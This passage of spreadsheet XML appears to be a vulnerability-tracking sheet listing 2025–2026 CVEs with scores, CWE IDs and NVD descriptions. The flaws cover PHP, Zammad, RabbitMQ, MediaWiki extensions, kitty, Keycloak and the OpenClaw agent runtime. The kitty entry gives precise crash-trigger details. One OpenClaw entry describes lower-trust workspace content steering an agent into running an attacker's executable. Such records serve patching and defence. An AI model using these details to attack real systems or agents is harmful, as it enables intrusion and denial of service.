        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-67</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>On Windows, PHP's filesystem and stream APIs do not reject reserved device names such as CON, PRN, AUX, NUL, COM1 to COM9, LPT1 to LPT9, CONIN$ and CONOUT$ when they appear as a component of a path. An attacker-controlled filename therefore reaches CreateFileW() and opens a device instead of the regular file the application expected, which can block or hang the request and exhaust worker processes.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17545</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63207</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-312, CWE-522</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. In 7.0.3 and 7.1.1, an authenticated administrator can obtain stored integration credentials in cleartext through the integration administration API. Certain responses do not consistently mask sensitive fields, so configured secrets can be returned in plain text instead of the expected masked placeholder. Both the LDAP and Exchange integrations are affected. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63207</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67226</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.0.22 and 4.1.14 and 4.2.7, Admin-only atom exhaustion: PUT /api/users tags list. settags/2 maps rabbitdatacoercion:toatom/1 over the user's tags list. The 20 MB management body limit fits ~3-4M short tag strings. An administrator can crash the node in a single request by creating a user (or importing definitions) with ~1M unique tag administrator. This issue is fixed in versions 4.0.22 and 4.1.14 and 4.2.7.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67226</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84461</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-203, CWE-307, CWE-799</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, the two-factor login step let an attacker try unlimited password guesses for any account without triggering Zammad's normal lockout or rate limiting. The response also revealed whether a guess was correct, even before two-factor authentication was checked. This made it possible to brute-force weak or reused passwords. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84461</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96875</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Stored XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96875</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96876</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96876</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96877</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96877</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96878</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96878</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96879</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>Improper removal of sensitive information before storage or transfer vulnerability in Wikimedia Foundation's Mediawiki - FlaggedRevs extension through 1.46.0.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96879</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100540</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Feishu before 2026.8.1 fails to validate whether a configured default account is disabled before selecting it for model tool operations. Attackers can exploit multi-account setups where a disabled default account retains credentials to read or modify Feishu resources through a revoked identity.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100540</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80431</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds Write in the natural width branch of the text sizing protocol in kitty from 0.40.0 before 0.49.0 allows a program writing to the terminal to write past the end of a fixed-size buffer, because screen_handle_multicell_command() in kitty/screen.c appends each codepoint of a grapheme cluster with lc.chars[lc.count++] = ch without any capacity check, while lc is declared by the RAII_ListOfChars macro as a four-element char_type array in the function's stack frame, so an OSC 66 escape code whose payload carries a grapheme cluster longer than four codepoints writes beyond that buffer, one 32-bit value per additional codepoint, in the order the codepoints appear. Where the cluster is preceded in the same payload by a sequence that causes an intermediate flush, the buffer is first migrated to the heap by ensure_space_for_chars() and the write occurs past the heap allocation instead. This results in termination of the kitty process and therefore of all its windows, tabs and child processes.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80431</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97846</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>keycloak, gin</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Keycloak provides a feature called mTLS holder-of-key binding which ensures that a token can only be used by the client that originally requested it by binding it to their digital certificate. A flaw was discovered where the new Standard Token Exchange V2 feature does not check for this certificate. This allows an attacker with stolen client credentials to obtain a standard, unrestricted token that bypasses these security protections.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97846</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100584</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed agent runtime. In versions &gt;= 2026.2.26 and &lt; 2026.7.1, PowerShell command analysis on Windows hosts running in exec allowlist mode could approve an exact executable resolved from PATH but subsequently execute a same-named executable located in the workspace directory. If lower-trust content can place an executable with an approved basename into an agent-writable workspace and steer an approved PowerShell command that uses a bare executable name, OpenClaw may run the workspace file instead of the allowlisted path, executing arbitrary code with the privileges of the Gateway or node-host user. The issue does not require replacement of the approved executable itself. Version 2026.7.1 contains a fix; as a workaround, avoid bare executable names in approved PowerShell commands and keep executable files out of agent-writable workspaces.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100584</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96448</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Fine-Grained Admin Permissions (FGAP v2) feature of Keycloak, an identity and access management solution. The issue occurs when the system checks if a delegated administrator has permission to assign a specific role to a user. Because the check does not look inside composite roles to see what other permissions they contain, an administrator with limited rights can assign a role that secretly includes full administrative control. This allows the attacker to gain complete management access over the entire realm.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96448</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14181</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>The SOAP HTTP client guards its response buffer growth with a check that relies on signed integer overflow, which is undefined behaviour and is not guaranteed to trigger. When the check is optimised away, a malicious SOAP server can make the client allocate a buffer far smaller than the data it then writes into it, producing a heap buffer overflow.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14181</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100192</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
